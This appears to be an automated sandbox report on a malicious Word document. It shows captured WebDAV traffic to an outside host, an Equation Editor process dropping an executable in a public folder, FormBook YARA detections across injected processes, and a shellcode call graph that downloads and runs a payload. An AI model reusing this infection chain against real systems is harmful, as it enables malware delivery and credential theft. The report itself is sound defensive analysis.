                                              2023-06-13 09:01:22 UTC43OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6f 63 64 6a 30 69 6c 76 73 70 62 37 32 75 76 73 32 35 66 39 71 6d 39 6e 31 6e 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 65 73 61 2e 6d 65 0d 0a 0d 0a
                                              Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=ocdj0ilvspb72uvs25f9qm9n1nUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: unesa.me
                                              2023-06-13 09:01:23 UTC43INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Tue, 13 Jun 2023 09:01:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              X-XSS-Protection: 1; mode=block
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: sameorigin
                                              Strict-Transport-Security: max-age=15768000;
                                              2023-06-13 09:01:23 UTC44INData Raw: 31 39 32 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 21 2d 2d 20 52 65 71 75 69 72 65 64 20 6d 65 74 61 20 74 61 67 73 20 2d 2d 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 55 72 6c 20 53 68 6f 72 74 65 6e 65 72 20 55 6e 65 73 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6d 65
                                              Data Ascii: 192c<!doctype html><html lang="id"> <head> ... Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Url Shortener Unesa</title> <me
                                              2023-06-13 09:01:23 UTC45INData Raw: 65 65 6e 2d 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 6c 61 6e 64 69 6e 67 22 20 64 61 74 61 2d 73 63 72 65 65 6e 2d 6e 61 6d 65 3d 22 6c 61 6e 64 69 6e 67 22 20 6f 6e 6c 6f 61 64 3d 22 6c 6f 61 64 28 29 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 62 6f 74 72 6f 6e 20 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 6c 61 6e 64 69 6e 67 2d 68 65 72 6f 20 6d 62 2d 30 20 6d 62 2d 6d 64 2d 34 20 62 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 20 70 74 2d 34 20 70 74 2d 6d 64 2d 35 20 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 20
                                              Data Ascii: een-wrapper" class="screen-landing" data-screen-name="landing" onload="load()"> <div class="jumbotron jumbotron-fluid landing-hero mb-0 mb-md-4 bg1"> <nav class="navbar navbar-expand-lg navbar-dark pt-4 pt-md-5 "> <div class="
                                              2023-06-13 09:01:23 UTC46INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 67 72 6f 75 70 20 69 6e 70 75 74 2d 67 72 6f 75 70 2d 6c 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 75 72 6c 22 20 69 64 3d 22 75 72 6c 22 20 6e 61 6d 65 3d 22 75 72 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 62 6f 72 64 65 72 20 62 6f 72 64 65 72 2d 70 72 69 6d 61 72 79 20 70 74 2d 32 20 70 74 2d 73 6d 2d 30 20 70 62 2d 32 20 70 62 2d 73 6d 2d 30 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 55 52 4c 2f 20 54 61 75 74 61 6e 20 50 61 6e 6a 61 6e 67 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 65 6d 70 65 6c 20 74 61 75 74 61 6e 20
                                              Data Ascii: <div class="input-group input-group-lg"> <input type="url" id="url" name="url" class="form-control border border-primary pt-2 pt-sm-0 pb-2 pb-sm-0" placeholder="URL/ Tautan Panjang" aria-label="Tempel tautan
                                              2023-06-13 09:01:23 UTC47INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 49 4e 47 4b 41 54 4b 41 4e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20
                                              Data Ascii: SINGKATKAN</button> </div> </div> </form> </div> </div> </div> </div>
                                              2023-06-13 09:01:23 UTC49INData Raw: 65 72 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 65 73 61 2e 61 63 2e 69 64 22 3e 55 4e 45 53 41 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c
                                              Data Ascii: er" style="padding-top: 30px; text-align: center;"> <li class="nav-item"> <a class="nav-link" href="https://unesa.ac.id">UNESA</a> </li> <l


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE9
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE9
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE9
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE9

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:00:57
                                              Start date:13/06/2023
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13f0c0000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:5
                                              Start time:11:01:13
                                              Start date:13/06/2023
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:7
                                              Start time:11:01:17
                                              Start date:13/06/2023
                                              Path:C:\Users\Public\cleanmgr_settings.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\Public\cleanmgr_settings.exe"
                                              Imagebase:0x280000
                                              File size:847872 bytes
                                              MD5 hash:CFF6C145EB350EA686F48866937E0A76
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.1038091182.0000000012B39000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              General

                                              Target ID:8
                                              Start time:11:01:19
                                              Start date:13/06/2023
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
                                              Imagebase:0xdf0000
                                              File size:45216 bytes
                                              MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1056144185.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Target ID:9
                                              Start time:11:01:20
                                              Start date:13/06/2023
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xff040000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000009.00000002.1305552060.000000000B328000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high

                                              General

                                              Target ID:10
                                              Start time:11:01:27
                                              Start date:13/06/2023
                                              Path:C:\Windows\SysWOW64\cmmon32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                              Imagebase:0x860000
                                              File size:43008 bytes
                                              MD5 hash:EA7BAAB0792C846DE451001FAE0FBD5F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1293431078.00000000001F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1293276681.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.1293480956.0000000000220000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Target ID:11
                                              Start time:11:01:56
                                              Start date:13/06/2023
                                              Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
                                              Imagebase:0x12f0000
                                              File size:517064 bytes
                                              MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1114237135.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:31%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:56.9%
                                                Total number of Nodes:130
                                                Total number of Limit Nodes:4
                                                execution_graph 404 35f0677 GetPEB 405 35f0685 404->405 406 35f0595 407 35f0597 406->407 424 35f05aa LoadLibraryW 407->424 412 35f0626 472 35f064b 412->472 418 35f0645 ShellExecuteW 478 35f0670 418->478 421 35f0664 422 35f06aa 421->422 423 35f0673 ExitProcess 421->423 425 35f05b1 424->425 426 35f05c4 11 API calls 424->426 427 35f0626 425->427 428 35f061d 8 API calls 425->428 426->425 430 35f064b 3 API calls 427->430 429 35f05d5 URLDownloadToFileW 428->429 435 35f0636 5 API calls 429->435 431 35f063d 430->431 433 35f0645 ShellExecuteW 431->433 437 35f059c 431->437 434 35f0670 ExitProcess 433->434 436 35f0664 434->436 435->427 436->437 438 35f0673 ExitProcess 436->438 439 35f05c4 437->439 440 35f05c7 439->440 441 35f05d5 URLDownloadToFileW 440->441 442 35f061d 8 API calls 440->442 444 35f0636 5 API calls 441->444 442->441 445 35f0626 444->445 446 35f064b 3 API calls 445->446 447 35f063d 446->447 448 35f0645 ShellExecuteW 447->448 450 35f05b1 447->450 449 35f0670 ExitProcess 448->449 451 35f0664 449->451 450->412 453 35f061d URLDownloadToFileW 450->453 451->450 452 35f0673 ExitProcess 451->452 454 35f0626 453->454 455 35f0636 5 API calls 453->455 456 35f064b 3 API calls 454->456 455->454 457 35f063d 456->457 458 35f0645 ShellExecuteW 457->458 460 35f05d5 URLDownloadToFileW 457->460 459 35f0670 ExitProcess 458->459 461 35f0664 459->461 463 35f0636 460->463 461->460 462 35f0673 ExitProcess 461->462 464 35f0638 463->464 465 35f063d 464->465 466 35f064b 3 API calls 464->466 467 35f0645 ShellExecuteW 465->467 469 35f06aa 465->469 466->465 468 35f0670 ExitProcess 467->468 470 35f0664 468->470 469->412 470->469 471 35f0673 ExitProcess 470->471 473 35f064e ShellExecuteW 472->473 474 35f0664 473->474 475 35f0670 ExitProcess 473->475 476 35f063d 474->476 477 35f0673 ExitProcess 474->477 475->474 476->418 476->422 479 35f0673 ExitProcess 478->479 480 35f0502 481 35f0508 480->481 500 35f051e 481->500 483 35f0557 484 35f05c4 11 API calls 483->484 485 35f05b1 484->485 486 35f0626 485->486 488 35f061d 8 API calls 485->488 490 35f064b 3 API calls 486->490 489 35f05d5 URLDownloadToFileW 488->489 496 35f0636 5 API calls 489->496 492 35f063d 490->492 494 35f0645 ShellExecuteW 492->494 497 35f06aa 492->497 495 35f0670 ExitProcess 494->495 498 35f0664 495->498 496->486 498->497 499 35f0673 ExitProcess 498->499 501 35f0524 500->501 538 35f0545 501->538 503 35f05c4 11 API calls 504 35f05b1 503->504 505 35f0626 504->505 506 35f061d 8 API calls 504->506 510 35f064b 3 API calls 505->510 508 35f05d5 URLDownloadToFileW 506->508 516 35f0636 5 API calls 508->516 509 35f0595 18 API calls 511 35f0557 509->511 512 35f063d 510->512 511->503 514 35f0645 ShellExecuteW 512->514 518 35f050f 512->518 515 35f0670 ExitProcess 514->515 517 35f0664 515->517 516->505 517->518 519 35f0673 ExitProcess 517->519 518->483 518->485 520 35f0595 518->520 521 35f0597 520->521 522 35f05aa 15 API calls 521->522 523 35f059c 522->523 524 35f05c4 11 API calls 523->524 525 35f05b1 524->525 526 35f0626 525->526 527 35f061d 8 API calls 525->527 529 35f064b 3 API calls 526->529 528 35f05d5 URLDownloadToFileW 527->528 534 35f0636 5 API calls 528->534 530 35f063d 529->530 532 35f0645 ShellExecuteW 530->532 536 35f06aa 530->536 533 35f0670 ExitProcess 532->533 535 35f0664 533->535 534->526 535->536 537 35f0673 ExitProcess 535->537 536->483 539 35f0548 538->539 540 35f0595 18 API calls 539->540 541 35f0557 540->541 542 35f05c4 11 API calls 541->542 543 35f05b1 542->543 544 35f0626 543->544 545 35f061d 8 API calls 543->545 546 35f064b 3 API calls 544->546 547 35f05d5 URLDownloadToFileW 545->547 548 35f063d 546->548 552 35f0636 5 API calls 547->552 550 35f0645 ShellExecuteW 548->550 553 35f052b 548->553 551 35f0670 ExitProcess 550->551 554 35f0664 551->554 552->544 553->504 553->509 553->511 554->553 555 35f0673 ExitProcess 554->555

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_035F069F 1 Function_035F051E 2 Function_035F061D 1->2 4 Function_035F0595 1->4 9 Function_035F064B 1->9 11 Function_035F0545 1->11 12 Function_035F05C4 1->12 18 Function_035F0636 1->18 20 Function_035F0670 1->20 21 Function_035F06F0 1->21 2->9 2->18 2->20 3 Function_035F025C 4->2 4->9 4->12 4->18 4->20 23 Function_035F05AA 4->23 5 Function_035F0250 6 Function_035F00CF 7 Function_035F014D 8 Function_035F018D 9->20 10 Function_035F010A 11->2 11->4 11->9 11->12 11->18 11->20 12->2 12->9 12->18 12->20 13 Function_035F0502 13->1 13->2 13->4 13->9 13->12 13->18 13->20 13->21 14 Function_035F0000 15 Function_035F01BC 16 Function_035F00BB 17 Function_035F0677 17->0 18->9 18->20 19 Function_035F01F5 22 Function_035F036B 23->2 23->9 23->12 23->18 23->20 24 Function_035F002A 25 Function_035F0069 26 Function_035F02E2

                                                Executed Functions

                                                Function 035F05AA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 35f05aa LoadLibraryW 1 35f05b1-35f05b6 0->1 2 35f05ac call 35f05c4 0->2 3 35f05b8-35f0621 call 35f061d URLDownloadToFileW call 35f0636 1->3 4 35f0626-35f0643 call 35f064b 1->4 2->1 3->4 12 35f06aa-35f06b6 4->12 13 35f0645-35f0667 ShellExecuteW call 35f0670 4->13 15 35f06b9 12->15 13->15 24 35f0669 13->24 18 35f06bb-35f06bf 15->18 19 35f06c1-35f06c5 15->19 18->19 21 35f06cd-35f06d4 18->21 22 35f06da-35f06dc 19->22 23 35f06c7-35f06cb 19->23 25 35f06d8 21->25 26 35f06d6 21->26 27 35f06ec-35f06ed 22->27 23->21 23->22 24->22 28 35f066b-35f0675 ExitProcess 24->28 29 35f06de-35f06e7 25->29 26->22 32 35f06e9 29->32 33 35f06b0-35f06b3 29->33 32->27 33->29 34 35f06b5 33->34 34->15
                                                APIs
                                                • LoadLibraryW.KERNEL32(035F059C), ref: 035F05AA
                                                  • Part of subcall function 035F05C4: URLDownloadToFileW.URLMON(00000000,035F05D5,?,00000000,00000000), ref: 035F061F
                                                  • Part of subcall function 035F05C4: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F065D
                                                  • Part of subcall function 035F05C4: ExitProcess.KERNEL32(00000000), ref: 035F0675
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                • String ID: rocess
                                                • API String ID: 2508257586-1188804192
                                                • Opcode ID: 0070be71d68f4e7554deb3da41a96ca464743a3d348cfab1d154c18d2e41aa42
                                                • Instruction ID: 61d0535d8f2417195679a959c93155396e7295d02b9774b7f7ae76a6b0322aba
                                                • Opcode Fuzzy Hash: 0070be71d68f4e7554deb3da41a96ca464743a3d348cfab1d154c18d2e41aa42
                                                • Instruction Fuzzy Hash: B6216B9284D3C62FEB1397701C6EB55BF247FA3504F5C89CEA2C20A4E3E6985541C796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F051E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147filenetworkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 36 35f051e-35f052c call 35f06f0 call 35f0545 41 35f059e-35f05a5 36->41 42 35f052e-35f0533 36->42 45 35f05a6-35f05ac call 35f05c4 41->45 42->41 44 35f0535 42->44 44->45 46 35f0537-35f053b 44->46 50 35f05b1-35f05b6 45->50 48 35f053d 46->48 49 35f0590 46->49 48->50 51 35f053f-35f058f call 35f0595 48->51 52 35f0591-35f059b 49->52 53 35f05b8-35f0621 call 35f061d URLDownloadToFileW call 35f0636 50->53 54 35f0626-35f0643 call 35f064b 50->54 51->49 51->52 52->41 53->54 66 35f06aa-35f06b6 54->66 67 35f0645-35f0667 ShellExecuteW call 35f0670 54->67 69 35f06b9 66->69 67->69 79 35f0669 67->79 73 35f06bb-35f06bf 69->73 74 35f06c1-35f06c5 69->74 73->74 76 35f06cd-35f06d4 73->76 77 35f06da-35f06dc 74->77 78 35f06c7-35f06cb 74->78 80 35f06d8 76->80 81 35f06d6 76->81 82 35f06ec-35f06ed 77->82 78->76 78->77 79->77 83 35f066b-35f0675 ExitProcess 79->83 84 35f06de-35f06e7 80->84 81->77 87 35f06e9 84->87 88 35f06b0-35f06b3 84->88 87->82 88->84 89 35f06b5 88->89 89->69
                                                APIs
                                                • URLDownloadToFileW.URLMON(00000000,035F05D5,?,00000000,00000000), ref: 035F061F
                                                • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F065D
                                                • ExitProcess.KERNEL32(00000000), ref: 035F0675
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1028868612.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_35f0000_EQNEDT32.jbxd
                                                Similarity
                                                • API ID: DownloadExecuteExitFileProcessShell
                                                • String ID: rocess
                                                • API String ID: 3584569557-1188804192
                                                • Opcode ID: 033117e64c1abef41dd36818504d9ebda26dd2d44e4db2cb14d8cc29c5a1eb6d
                                                • Instruction ID: ae50742b7bea5f4b2d0e592439d924e0f7413d3020c4ff2164a8c19fc1ae52fb
                                                • Opcode Fuzzy Hash: 033117e64c1abef41dd36818504d9ebda26dd2d44e4db2cb14d8cc29c5a1eb6d
                                                • Instruction Fuzzy Hash: 6641A89684D3C62FDB13DB706D6E655BF207A93104F4C8ACF96C60E4E3E7989106C396
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 035F05C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
